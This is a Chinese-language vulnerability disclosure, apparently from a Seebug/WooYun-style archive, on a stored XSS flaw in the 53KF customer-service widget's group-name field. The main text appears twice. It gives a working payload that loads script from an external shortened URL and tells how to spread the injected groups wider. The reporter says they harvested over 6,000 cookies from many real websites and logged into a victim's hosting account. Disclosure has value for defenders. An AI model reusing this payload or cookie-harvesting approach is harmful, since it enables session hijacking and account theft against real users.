VULHUB ™

### 简要描述： 很牛逼很牛逼真的很牛逼，不信，你看 ### 详细说明： 53客服 某插件在网页右下角有个企业收藏夹 [<img src="https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png) 点开里面有个分组。 而这个分组到底是干什么的，怎么分配的。我现在也没弄清楚 但是它的分组名称是可修改的。 修改名称，插入代码 `test"><script src=http://is.gd/wnezNK></script>` [<img src="https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png" alt="插入.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png) 但是，审查元素去看代码。发现没有，失败了？ [<img src="https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png" alt="没有.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png) 可是实际上我们已经收到cookie了。 [<img...

### 简要描述： 很牛逼很牛逼真的很牛逼，不信，你看 ### 详细说明： 53客服 某插件在网页右下角有个企业收藏夹 [<img src="https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png) 点开里面有个分组。 而这个分组到底是干什么的，怎么分配的。我现在也没弄清楚 但是它的分组名称是可修改的。 修改名称，插入代码 `test"><script src=http://is.gd/wnezNK></script>` [<img src="https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png" alt="插入.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png) 但是，审查元素去看代码。发现没有，失败了？ [<img src="https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png" alt="没有.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png) 可是实际上我们已经收到cookie了。 [<img src="https://images.seebug.org/upload/201501/12140726dc212d5c731d7445a5d0f2aa7a7c2455.png" alt="总数.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140726dc212d5c731d7445a5d0f2aa7a7c2455.png) 挂了一晚上加一个上午，收获颇丰啊O(∩_∩)O哈！ 而且进去以后发现中枪的可不是一个域名。 7k7k，华夏名网，59互联，兄弟连+一大堆小站，6千加的cookie，怎么也有几百个网站吧。 [<img src="https://images.seebug.org/upload/201501/121417506087505eb9a7deb66690cbe527867336.png" alt="7k7kand华夏名网.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121417506087505eb9a7deb66690cbe527867336.png) 根据实现分析一下 当用户访问网站时，53kf会分配一个分组。 53kf 的分组是按照我不知道的条件出现在网页下，而且这个分组是可以跨网站，跨用户。 分组重命名的地方存在xss， 插入代码后，当用户访问网页时，53客服分配的分组如果是被我们插如代码的分组的话，用户就中枪了。 利用的时候，我们可以多改几个分组名，提高分组被系统选中的概率。 影响挺大的，理论上只要是你们的客户就可能中枪。 然后外部js代码都能执行了，你说我们能干什么？ ### 漏洞证明： [<img src="https://images.seebug.org/upload/201501/12144117a471da2c484aea8cf1b3349a2c0d6159.png" alt="59互联.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12144117a471da2c484aea8cf1b3349a2c0d6159.png) 测试中成功进入华夏名网某用户账户。 [<img src="https://images.seebug.org/upload/201501/121504186e9bd7f016eff4fd0a2ef93eb7bbcc65.png" alt="华夏登录.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121504186e9bd7f016eff4fd0a2ef93eb7bbcc65.png) [<img src="https://images.seebug.org/upload/201501/121503543b99d0f7bd678583ef6fa30c0893c091.png" alt="华夏主机.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121503543b99d0f7bd678583ef6fa30c0893c091.png)